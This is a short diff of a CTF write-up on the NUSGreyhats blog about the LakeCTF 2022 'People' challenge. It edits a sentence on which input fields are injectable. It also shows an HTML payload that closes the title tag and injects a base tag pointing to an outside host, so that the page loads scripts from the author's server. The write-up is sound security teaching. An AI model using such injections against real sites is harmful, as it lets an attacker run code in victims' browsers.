NUSGreyhats/NUSGreyhats.github.io/content/posts/writeups/[LAKECTF 2022] People.md

 The payload that I used for the base injection is shown below and the github link upload is hosted at that url.
 This payload was only injected into the lab field.

-This payload will work if you inject it into either of the fields
+This payload will work if you inject it into either of the fields as both of them are combined together to form the description in the title tag.

 ```html
 </title><base href="http://payload.jh123x.com/" />